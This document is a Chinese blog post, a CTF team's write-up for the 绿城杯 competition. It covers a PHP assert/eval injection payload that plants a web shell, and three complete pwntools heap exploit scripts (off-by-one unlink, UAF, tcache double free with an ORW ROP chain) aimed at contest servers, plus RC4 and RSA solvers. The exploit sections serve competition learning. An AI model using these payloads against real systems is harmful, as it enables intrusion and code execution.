绿城杯


阅读数: 次   
字数统计: 3k字   |   阅读时长: 16分

绿城杯

A1igNed战队

1
2
3
4
5
1. 解题过程中,关键步骤不可省略,不可含糊其辞、一笔带过。
2. 解题过程中如是自己编写的脚本,不可省略,不可截图(代码字体可以调小;而如果代码太长,则贴关键代码函数)。
3. 您队伍所有解出的题目都必须书写WRITEUP,缺少一个则视该WRITEUP无效,队伍成绩将无效。
4. WRITEUP如过于简略和敷衍,导致无法形成逻辑链条推断出战队对题目有分析和解决的能力,该WRITEUP可能被视为无效,队伍成绩将无效。
5. 提交PDF版本即可

一、战队信息

  • 名称:A1igNed
  • 排名:39

二、解题情况

粘贴解题图片
misc
请添加图片描述
pwn
请添加图片描述
reverse
请添加图片描述
web
请添加图片描述
crypt
请添加图片描述

三、解题过程

题目按照顺序填写

Web

ezphp

1
http://b6863fec-f86d-4e86-9ebe-770c72b403e9.zzctf.dasctf.com/?link_page=about

测试url:
请添加图片描述

报错,assert函数执行,似乎是原型题?测试命令注入

1
link_page=') or eval("print(8*9);");//

请添加图片描述

存在漏洞

1
?link_page=%27)%20or%20eval($_POST[%27ok%27]);//

蚁剑连接,拿flag

请添加图片描述

PWN

害,盲猜libc,说多都是泪啊

1.null_pwn

1
2
3
4
5
6
7
8
9
10
11
12
ssize_t __fastcall read_input(void *a1, __int64 a2)
{
  ssize_t result; // rax

  result = read(0, a1, a2 + 1);  //off by one
  if ( (int)result <= 0 )
  {
    puts("Error");
    exit(0);
  }
  return result;
}

off by one 漏洞,没有开PIE,程序段heaparray地址已知,经典unlink,控制完指针还有edit,随便打了。不过后面打free_hook好像出了点问题,改打atoi_got表,拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "null_pwn"

ip = "82.157.5.28"
port =50904
# 82.157.5.28
# port: 50904
#
# libc
# libc
local_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
remote_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,size,payload):
    io.recvuntil(b"Your choice :")
    io.sendline(b'1')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Size of Heap : ")
    io.sendline(str(size).encode())
    io.recvuntil(b"Content?:")
    io.send(payload)

def free(idx):
    io.recvuntil(b"Your choice :")
    io.sendline(b'2')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())

def edit(idx,payload):
    io.recvuntil(b"Your choice :")
    io.sendline(b'3')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"Content?:")
    io.send(payload)

def show(idx):
    io.recvuntil(b"Your choice :")
    io.sendline(b'4')
    io.recvuntil(b"Index :")
    io.sendline(str(idx).encode())


def pwn():
    ### 2.23 ###
    add(0,0x88,b'bb')
    add(1,0xf0,b'bb')
    add(2,0x80,b'cc')
    target=0x0000000000602120
    fake_fd=target-0x18
    fake_bk=target-0x10
    edit(0,p64(0)+p64(0x81)+p64(fake_fd)+p64(fake_bk)+b'a'*(0x60)+p64(0x80)+b'\x00')
    free(1)
    edit(0,p64(0x100)*3+p64(0x00000000006020E0)+p64(target))
    edit(0,p64(0x100)*8)
    edit(1,p64(elf.got['puts']))
    show(0)
    puts_addr=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
    libcbase=puts_addr-libc.symbols['puts']
    success("libcbase:"+hex(libcbase))
    free_hook=libcbase+libc.symbols['__free_hook']
    success("free_hook:"+hex(free_hook))
    # io.recvuntil(b"Your choice :")
    # io.sendline(b'3')
    # io.recvuntil(b"Index:")
    # io.sendline(str(1).encode())
    # io.recvuntil(b"Content?:")
    # io.sendline(p64(free_hook))

    # edit(1,p64(free_hook))
    edit(1,p64(elf.got['atoi']))
    system_addr=libcbase+libc.symbols['system']
    edit(0,p64(system_addr))
    # add(5,0x80,b'/bin/sh\x00')
    # free(5)
    io.recv()
    io.sendline(b'sh')

    # b(0x0000000000400D87)


if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            pwn()
            io.interactive()
            flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

2.uaf_pwn

一开始给了栈上的一个地址,存chunk的指针
free函数,指针没有置零造成uaf,libc2.23直接申请0x80以上后free到unsorted_bin里面,show泄露libc,然后打malloc_hook为one_gadget即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "uaf_pwn"

ip = "82.157.5.28"
port =52002
# libc
# libc
local_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
remote_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,size):
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b"size>")
    io.sendline(str(size).encode())

def free(idx):
    io.recvuntil(b'>')
    io.sendline(b'2')
    io.recvuntil(b"index>")
    io.sendline(str(idx).encode())

def edit(idx,payload):
    io.recvuntil(b'>')
    io.sendline(b'3')
    io.recvuntil(b"index>")
    io.sendline(str(idx).encode())
    io.recvuntil(b"content>")
    io.send(payload)

def show(idx):
    io.recvuntil(b'>')
    io.sendline(b'4')
    io.recvuntil(b"index>")
    io.sendline(str(idx).encode())

def pwn():

    stack_addr=int(io.recv(14),16)
    success("stack_addr:"+hex(stack_addr))

    ### 2.23 ###
    add(0,0x80)
    add(1,0x60)
    free(0)
    show(0)
    malloc_hook=u64(io.recv(6).ljust(8,b'\x00'))-88-0x10
    success("malloc_hook:"+hex(malloc_hook))
    libcbase=malloc_hook-libc.symbols['__malloc_hook']
    success("libcbase:"+hex(libcbase))
    add(2,0x60)
    free(1)
    edit(1,p64(malloc_hook-0x23))
    add(3,0x60)
    add(4,0x60)
    ogg=libcbase+onegadget[1]
    edit(4,b'a'*(0x13)+p64(ogg))#+p64(malloc_hook-8))
    add(9,0x10)
    # add(6,0x20)
    
    ### 2.27 ###
    # add(0, 0x80)
    # for i in range(7):
    #     add(i+1,0x80)
    # for i in range(7):
    #     free(i+1)
    # free(0)
    # show(0)
    # malloc_hook=u64(io.recv(6).ljust(8,b'\x00'))-96-0x10
    # # malloc_hook=int(io.recv(14),16)-96-0x10
    # success("malloc_hook:"+hex(malloc_hook))
    # libcbase=malloc_hook-libc.symbols['__malloc_hook']
    # success("libcbase:"+hex(libcbase))
    # free_hook=libcbase+libc.symbols['__free_hook']
    # add(8,0x60)
    # # add(9,0x10)
    # free(8)
    # edit(8,p64(free_hook))
    # add(9,0x60)
    # add(10,0x60)
    # system_addr=libcbase+libc.symbols['system']
    # edit(9,b'/bin/sh\x00')
    # edit(10,p64(system_addr))
    # free(9)
    # b(0xd2b)



if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                onegadget=[0x45226,0x4527a,0xf03a4,0xf1247]
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                # onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                onegadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                # onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            pwn()
            io.interactive()
            flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

3.GreentownNote

seccomp-tools查看系统禁用,禁了execve,不能用system(“/bin/sh\x00”)
free之后置零了但没完全置零,,,还是uaf
虽然限制了add,但只用一个堆块多次free填满tcache即可
泄露libc,double free,打tcache,申请到free_hook,打setcontext+53,
orw即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python3
# coding=utf-8
from pwn import *

# from z3 import *
arch = "amd64"
filename = "GreentownNote"

ip = "82.157.5.28"
port =50401
# libc
# libc
local_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
remote_libc = ELF("/home/qingmu-z/Desktop/tools/pwn-change-libc/libs/2.27-3ubuntu1_amd64/libc-2.27.so")
# ld
# local_ld=ELF("/lib64/ld-linux-x86-64.so.2")
# remote_ld=ELF("/lib64/ld-linux-x86-64.so.2")

context(os="linux", arch=arch, log_level="debug")
# context.terminal = ['tmux', 'split','-h']
content = 1

offset = 0
# elf
elf = ELF(filename)


def b(addr):
    bk = "b *$rebase" + str(addr)
    gdb.attach(io, bk)
    success("attach")

def add(idx,size,payload):
    io.recvuntil(b"> Your choice :")
    io.sendline(b'1')
    io.recvuntil(b"> Note size :")
    io.sendline(str(size).encode())
    io.recvuntil(b"> Content :")
    io.send(payload)

def show(idx):
    io.recvuntil(b"> Your choice :")
    io.sendline(b'2')
    io.recvuntil(b"| Index :")
    io.sendline(str(idx).encode())

def free(idx):
    io.recvuntil(b"> Your choice :")
    io.sendline(b'3')
    io.recvuntil(b"| Index :")
    io.sendline(str(idx).encode())

def pwn():
    add(0,0xf0,b'bbb')
    add(1,0xf0,b'bbb')
    add(2,0xf0,b'ccc')
    # add(3,0xf0,b'bbb')
    free(0)
    free(1)
    show(1)
    io.recvuntil(b"| Content: ")
    chunk_addr=u64(io.recv(6).ljust(8,b'\x00'))
    success("chunk_addr:"+hex(chunk_addr))
    chunk_base=chunk_addr-0x260
    success("chunk_base:"+hex(chunk_base))
    chunk_bins=chunk_addr+0x100
    free(1)
    free(1)
    free(1)
    free(1)
    free(1)
    free(1)
    show(1)
    io.recvuntil(b"| Content: ")
    malloc_hook = u64(io.recv(6).ljust(8, b'\x00'))-96-0x10
    libcbase=malloc_hook-libc.symbols['__malloc_hook']
    success("malloc_hook:"+hex(malloc_hook))
    success("libcbase:"+hex(libcbase))
    add(0,0x80,b'bb')
    free(0)
    free(0)
    free_hook=libcbase+libc.symbols['__free_hook']
    success("free_hook:"+hex(free_hook))
    add(0,0x80,p64(free_hook))
    add(1,0x80,p64(free_hook))
    setcontext_53=libcbase+libc.symbols['setcontext']+53
    add(3,0x80,p64(setcontext_53))

    ret_addr = libcbase + 0x00000000000008aa
    framebase = chunk_base + 0x560
    flag_addr = chunk_base + 0x670
    rop_addr = flag_addr + 0x10
    pop_rdi = libcbase + next(libc.search(asm("pop rdi\nret")))
    pop_rsi = libcbase + next(libc.search(asm("pop rsi\nret")))
    pop_rdx = libcbase + next(libc.search(asm("pop rdx\nret")))
    open_addr = libcbase + libc.symbols['open']
    read_addr = libcbase + libc.symbols['read']
    write_addr = libcbase + libc.symbols['write']
    rop_chain = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(open_addr)
    rop_chain += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(read_addr)
    rop_chain += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(write_addr)
    payload = b'a' * (0xa0) + p64(rop_addr) + p64(ret_addr)
    add(4,0x100,payload)  ###frame
    payload=b'/flag\x00\x00\x00'+p64(0)+rop_chain
    add(5,0x100,payload)  ###flag_addr
    free(4)
    # b(0x0000000000000DD7)

if __name__ == '__main__':
    global io
    flag = 1
    while flag >= 1:
        try:
            if content == 0:
                io = process("./" + filename)
                libc = local_libc
                # ld = local_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            else:
                io = remote(ip, port)
                libc = remote_libc
                # ld = remote_ld
                # onegadget = [0x4f2c5, 0x4f322, 0x10a38c] #2.23 11.3
                onegadget = [0xe6c7e, 0xe6c81, 0xe6c84]  # 2.31 9.2
            pwn()
            io.interactive()
            flag = 0
        except Exception as e:
            print(e)
            io.close()
            flag -= 1
            continue

RE

1.[warmup]easy_re

ida不能F5,选中main函数,转为数据,在转为代码,再按p识别,就能F5了。
主要逻辑为改了一点的rc4加密。对S盒进行变化时,多了一步变化,分析完就可以写脚本了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include <stdio.h>
#include <string.h>

int main()
{
    unsigned char T[256]={0};
    unsigned char S[256];
    int flag[42] = {0xF5, 0x8C, 0x8D, 0xE4, 0x9F, 0xA5, 0x28, 0x65, 0x30, 0xF4,
                    0xEB, 0xD3, 0x24, 0xA9, 0x91, 0x1A, 0x6F, 0xD4, 0x6A, 0xD7,
                    0x0B, 0x8D, 0xE8, 0xB8, 0x83, 0x4A, 0x5A, 0x6E, 0xBE, 0xCB,
                    0xF4, 0x4B, 0x99, 0xD6, 0xE6, 0x54, 0x7A, 0x4F, 0x50, 0x14,
                    0xE5, 0xEC};
    int len=sizeof(flag)/sizeof(flag[0]);
    char key[9]="tallmewhy";
    int j=0;
    int i=0;
    int temp;
    for(i=0; i< 256; i++)
    {
            T[i] = key[i % 9];
            S[i]=i;
    }
    for(i=0; i<256;i++)
    {
            temp = S[i];
            j = (T[i] + j +S[i])%256;

            S[i] = S[j];
            S[j] = temp^0x37;
    }
    i = j = 0;
    int t;
    for(int r=0; r<len;r++)
    {
            i = (i+1) % 256;
            j = (j+S[i]) % 256;
            temp = S[i];
            S[i] = S[j];
            S[j] = temp;
            t = (S[i]+S[j])%256;
            flag[r]^=S[t];
            printf("%c",flag[r]);
    }
    return 0;
}
flag{c5e0f5f6-f79e-5b9b-988f-28f046117802}

Crypto

同学在上课,手头没电脑,没法写数据,,,

1. warm加密算法:

就是个简单的仿射密码,逆运算求就行了

1
2
3
4
5
6
7
8
9
10
str1=''
cipher=''
a=
b=
m=
for i in cipher:
    if i in str1:
        print(str1[str1.index(i)-b)*invert(a,m)%m,end='')
    else:
        print(i,end='')

2. rsa-1

一点简单的同余知识
请添加图片描述

1
2
3
4
5
6
7
8
9
10
11
from gmpy2 import *
from Crypto.Util.number import *
e=65537
c=
n=
p=gcd(c,n)
q=n//p
phi=(p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,q)*invert(a*p,q)%q
print(long_to_bytes(m))

然后直接就出了。

3. rsa

额,第一部分祥云2020原题?直接梭吧
https://blog.csdn.net/hiahiachang/article/details/109749551
第二部分就是个解方程,然后求欧拉函数利用欧拉定理就出了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from Crypto.Util.number import *
from gmpy2 import *

e = 
n = 
c = 

def fermat_factorization(n):
	factor_list = []
	get_context().precision = 2048
	x = int(sqrt(n))

	while True:
		x += 1

		y2 = x ** 2 - n
		if is_square(y2):
			#print('x = ',x)
			y2 = mpz(y2)
			get_context().precision = 2048
			y = int(sqrt(y2))
			factor_list.append([x+y, x-y])
		if len(factor_list) == 2:
			break
	return factor_list

def main():
	factor_list = fermat_factorization(n)
	#print(factor_list)
	[X1, Y1] = factor_list[0]
	[X2, Y2] = factor_list[1]
	assert X1 * Y1 == n
	assert X2 * Y2 == n
	p1 = gcd(X1, X2)
	q1 = X1 // p1
	p2 = gcd(Y1, Y2)
	q2 = Y1 // p2
	#print('p1 =',p1)
	#print('p2 =',p2)
	#print('q1 =',q1)
	#print('q2 =',q2)

	phi = (p1 - 1) * (q1 - 1) * (p2 - 1) * (q2 - 1)
	d = inverse(e, phi)
	flag = long_to_bytes(pow(c, d, n))
	print(flag)

if __name__ == "__main__":
	main()
from z3 import *
s=Solver()
p2,q2=Ints('p2 q2')
s.add(p2*q2==)
s.add(p2+q2==)
if s.check()==sat:
    print(s.model())
phi=(p2**2-p2)*(q2**3-q2**2)
e=65537
d=invert(e,phi)
c=
n=
m=pow(c,d,n)
print(long_to_bytes(m))

misc

拿到音频文件,首先用Au打开,看有无特殊波形,结果在后半部分发现异常波,将时轨缩进,得以看到flag
请添加图片描述

创新技术



-------------本文结束感谢您的阅读-------------



谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

朱登榜,来自河南郑州,河南大学学生,倘若文章有错误,望提醒修正,感谢!<br>qq:879322660<br>微信:z15981855791